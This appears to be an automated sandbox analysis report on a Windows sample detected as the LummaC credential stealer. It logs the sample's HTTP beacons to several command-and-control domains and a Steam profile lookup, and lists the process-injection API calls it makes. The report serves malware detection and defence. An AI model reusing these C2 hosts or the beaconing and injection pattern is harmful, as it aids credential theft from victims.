                                                                        3192.168.2.449739188.114.97.34437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:19 UTC266OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: offensivedzvju.shop
                                                                        2024-09-26 19:26:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:19 UTC768INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=e2cem0bnqls4rerse4lv3tj6h4; expires=Mon, 20 Jan 2025 13:12:58 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4xp7m1fqVX9ph1d7ElRhz71Jf2NNoHmcbD61ShM4wzkoysdguRN9wwKmc1zTqHpx62YjI1LK%2Bn5fCOfZp5hWuh0bAVI88aVtvRm0f%2FhYg86i5UCJEBvNjMFcxcElNUDuFisnr8wU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a51c89bb8c81-EWR
                                                                        2024-09-26 19:26:19 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.449740188.114.96.34437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:20 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: vozmeatillu.shop
                                                                        2024-09-26 19:26:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:20 UTC782INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=15h75bih8nhm19fo99nq60fgen; expires=Mon, 20 Jan 2025 13:12:59 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6ce%2FRlRqRoB7PGT%2BWMsFr8gvLCWXkO%2B1%2FBiyzYMTkCpkiNAclUtS0%2BG489l%2F4MAMHApu0btiI%2Bx0rkCSRooTysTi5NGZEf%2BX%2BI%2Fcz3VLl0NGz8wwUCpI55W2ENmUVoRV9%2BI"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a5228e7e5e70-EWR
                                                                        2024-09-26 19:26:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449741172.67.162.1084437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:21 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: drawzhotdog.shop
                                                                        2024-09-26 19:26:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:22 UTC772INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=5jjinqp40fdtgar9gpfu3f8jhe; expires=Mon, 20 Jan 2025 13:13:01 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W7yENhlFpQHhJ02SANMZnNM%2BcK32t3xyZo%2BIbDKfBZQb9aIz92IdfLhd%2FbhDqi3xJK2XI%2BlKF4DezmAvZfhqikl2K5Ap4mNuFfbmEYZUSLQ3%2FhrC0spabibMWrr%2BpV7afX89"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a52bdd074204-EWR
                                                                        2024-09-26 19:26:22 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449742188.114.97.34437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:22 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: fragnantbui.shop
                                                                        2024-09-26 19:26:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:23 UTC766INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=gvppk838c8k3kdn9lpdq4ppp0a; expires=Mon, 20 Jan 2025 13:13:02 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=prSUZPOcebQjo9av4kBmfDk7%2FnHgFHYVFI4p0CYVDk1g86VOs3cYPUTZu5i6PMz1mpl2iUqXChk5lesjkf9LbQJvokDJli%2FieztChMcx0u5sIY4uhHZA6CNU%2BqmKJkhxe4wC"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a5322af70ca5-EWR
                                                                        2024-09-26 19:26:23 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449743188.114.96.34437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:24 UTC265OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: stogeneratmns.shop
                                                                        2024-09-26 19:26:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:24 UTC780INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=k8pmksmpldeg5d3e6i0v0b489g; expires=Mon, 20 Jan 2025 13:13:03 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFQF3UL%2BsKtaodywRi0vdtDru9%2F%2BXiBPQ0Gund5dtdzxROBvL%2F1QbXGtfQbrVC%2BzkSjhpSj0rYODVPxxqpMbTjxEKz7M6WYN%2Fnc5uhAh0u9fR4iitiaRSOvTzC36pZo5B%2FCtlkw%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a53a6c5b42b5-EWR
                                                                        2024-09-26 19:26:24 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449744172.67.208.1394437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:25 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: reinforcenh.shop
                                                                        2024-09-26 19:26:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:25 UTC766INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=mpsemti9muical24kqfn44mpr7; expires=Mon, 20 Jan 2025 13:13:04 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbwPheRcDvDi0f8k74nP2kPX9ne9rZ4L6X2iUmmotTZsNTY7C2dz1h%2BOmZxUPHimrrlG2awl%2BgwG8Qo1Q7hMcNs0PZca%2BBZVt0R7ryzcBtNzYnjRoChIky8l81oG1rlgDngD"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a5402cf341a9-EWR
                                                                        2024-09-26 19:26:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449745104.102.49.2544437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:26 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Host: steamcommunity.com
                                                                        2024-09-26 19:26:26 UTC1870INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                        Cache-Control: no-cache
                                                                        Date: Thu, 26 Sep 2024 19:26:26 GMT
                                                                        Content-Length: 34663
                                                                        Connection: close
                                                                        Set-Cookie: sessionid=051c7165566eab8c46100c5f; Path=/; Secure; SameSite=None
                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                        2024-09-26 19:26:26 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                        2024-09-26 19:26:27 UTC16384INData Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61
                                                                        Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
                                                                        2024-09-26 19:26:27 UTC3765INData Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70
                                                                        Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.449746172.67.128.1444437016C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-09-26 19:26:27 UTC261OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: ballotnwu.site
                                                                        2024-09-26 19:26:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:28 UTC770INHTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:27 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=bp92llogdsbmg4q7ek5vphsdou; expires=Mon, 20 Jan 2025 13:13:06 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=erdNRCsFf4phcTzlkosY8e8oS%2B8dUZ%2BGWKRLxEZS560Ucn3damaVyZizNg4oq%2FfMoIqvBy2PqajRH60Qiayyd0F7f5AFNVz2bP4vhA6tK5PKU5gbzak2JmlgYXPitCB6Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a54ec98980cd-EWR
                                                                        2024-09-26 19:26:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:15:25:57
                                                                        Start date:26/09/2024
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
                                                                        Imagebase:0x400000
                                                                        File size:4'547'072 bytes
                                                                        MD5 hash:AAF6F0C0F007E9462C8BF58ACD555CAF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:15:26:14
                                                                        Start date:26/09/2024
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
                                                                        Imagebase:0x400000
                                                                        File size:4'547'072 bytes
                                                                        MD5 hash:AAF6F0C0F007E9462C8BF58ACD555CAF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:1.6%
                                                                          Dynamic/Decrypted Code Coverage:65.9%
                                                                          Signature Coverage:75.6%
                                                                          Total number of Nodes:135
                                                                          Total number of Limit Nodes:11
                                                                          execution_graph 28442 4bc4a8 28443 4bc4be ExitProcess 28442->28443 28448 4a4b8c 28451 4a4b9e 28448->28451 28452 4a4b53 VirtualProtect 28451->28452 28454 4a4c36 28452->28454 28455 4a4a2c 28456 4a4a56 VirtualProtect 28455->28456 28458 4a4aff 28456->28458 28459 4a4b45 VirtualProtect 28456->28459 28464 4a4b21 VirtualProtect 28458->28464 28463 4a4c36 28459->28463 28465 8342c8 28466 8342ef 28465->28466 28467 834329 VirtualAlloc 28466->28467 28468 8343a0 28467->28468 28469 8356fc VirtualFree 28468->28469 28470 835720 28469->28470 28471 4b4040 28472 4b4b90 NtQueryDefaultLocale 28471->28472 28473 4b4ba7 28472->28473 28474 4bab04 VirtualProtect 28483 4bab15 28474->28483 28476 4bbdf3 28487 4bbe19 ExitProcess 28476->28487 28477 4bb4e7 28486 4bb59d 8 API calls 28477->28486 28482 4bb1dd 28482->28476 28482->28477 28483->28482 28484 4bae7c 28483->28484 28485 4bb20c 8 API calls 28483->28485 28488 82ec31 VirtualProtect 28489 82ec62 28488->28489 28490 867f31 28491 868643 VirtualProtect 28490->28491 28492 868664 28491->28492 28493 4b3553 28494 4b3584 NtQueryDefaultLocale 28493->28494 28496 4b35e5 28494->28496 28500 4b37a7 28494->28500 28522 4b360f 9 API calls 28496->28522 28499 4b3879 28514 4b3b60 28499->28514 28500->28499 28501 4b38e4 28500->28501 28523 4b391e 7 API calls 28501->28523 28503 4b3b56 28505 4b3b83 28503->28505 28511 4b4490 28503->28511 28506 4b3c30 NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 28505->28506 28508 4b3c28 28506->28508 28512 4b4b90 NtQueryDefaultLocale 28511->28512 28513 4b4ba7 28512->28513 28515 4b3b6f 28514->28515 28516 4b3b83 28515->28516 28519 4b4490 28515->28519 28524 4b3c30 NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 28516->28524 28520 4b4b90 NtQueryDefaultLocale 28519->28520 28521 4b4ba7 28520->28521 28525 8791bb 28528 87920c 28525->28528 28531 87922a 28528->28531 28529 87989f WriteProcessMemory 28530 8798db 28529->28530 28536 8798d6 28529->28536 28555 8799e4 28530->28555 28531->28529 28533 879eb3 28534 879ed3 9 API calls 28533->28534 28540 879ecb 28534->28540 28535 8799dc 28535->28533 28537 87a24b 28535->28537 28542 879ea4 28535->28542 28539 87a9f1 DebugActiveProcessStop NtCreateThreadEx NtCreateThreadEx NtCreateThreadEx NtCreateThreadEx 28537->28539 28544 87a19e 28537->28544 28538 87c13a DebugActiveProcessStop 28545 87c169 28538->28545 28539->28544 28541 87a467 7 API calls 28540->28541 28540->28542 28543 87a45d 28541->28543 28542->28537 28542->28540 28542->28544 28543->28537 28544->28536 28544->28538 28546 87c4cf NtCreateThreadEx NtCreateThreadEx NtCreateThreadEx 28545->28546 28549 87c4c5 28546->28549 28547 87c98d NtCreateThreadEx 28547->28536 28549->28547 28550 87ca2e 28549->28550 28553 87cb79 28549->28553 28550->28547 28551 87d3ac NtCreateThreadEx 28550->28551 28551->28547 28552 87cbd0 NtCreateThreadEx NtCreateThreadEx 28552->28553 28553->28549 28553->28552 28554 87cc33 28553->28554 28554->28550 28558 879a11 28555->28558 28556 879eb3 28588 879ed3 9 API calls 28556->28588 28558->28556 28559 87a24b 28558->28559 28564 879ea4 28558->28564 28567 87a19e 28559->28567 28590 87a9f1 28559->28590 28560 87c13a DebugActiveProcessStop 28566 87c169 28560->28566 28562 879ecb 28562->28564 28589 87a467 7 API calls 28562->28589 28564->28559 28564->28562 28564->28567 28578 87c4cf 28566->28578 28567->28560 28577 87ad34 28567->28577 28580 87c4fe 28578->28580 28582 87ca2e 28578->28582 28580->28582 28583 87c98d NtCreateThreadEx 28580->28583 28584 87cb79 28580->28584 28581 87d54e 28582->28583 28605 87d3ac 28582->28605 28583->28581 28584->28580 28587 87cc33 28584->28587 28604 87cb79 NtCreateThreadEx NtCreateThreadEx 28584->28604 28587->28582 28592 87aa1a 28590->28592 28591 87c13a DebugActiveProcessStop 28593 87c169 28591->28593 28592->28591 28595 87ad34 28592->28595 28594 87c4cf 3 API calls 28593->28594 28596 87c4c5 28594->28596 28597 87ca2e 28596->28597 28599 87c98d NtCreateThreadEx 28596->28599 28602 87cb79 28596->28602 28597->28599 28600 87d3ac NtCreateThreadEx 28597->28600 28599->28595 28600->28599 28602->28596 28603 87cc33 28602->28603 28609 87cb79 NtCreateThreadEx NtCreateThreadEx 28602->28609 28603->28597 28606 87d348 28605->28606 28607 87d50b NtCreateThreadEx 28606->28607 28608 87d54e 28607->28608 28614 83c3be 28617 83c3d4 28614->28617 28618 83c3f9 VirtualProtect 28617->28618 28620 83c4a2 28618->28620 28621 83c561 VirtualProtect 28620->28621 28625 83c52f 28620->28625 28623 83c593 28621->28623 28627 83c4f6 28625->28627 28626 83c561 VirtualProtect 28628 83c593 28626->28628 28627->28626 28629 82ff1d 28630 8305e2 LoadLibraryW 28629->28630 28631 82fea5 28629->28631 28632 8305ff LoadLibraryW 28630->28632 28633 83061c 28630->28633 28631->28630 28632->28633

                                                                          Executed Functions

                                                                          Function 0087920C Relevance: 84.9, APIs: 1, Strings: 47, Instructions: 857injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 008798CC
                                                                          Strings
                                                                          Memory Dump Source
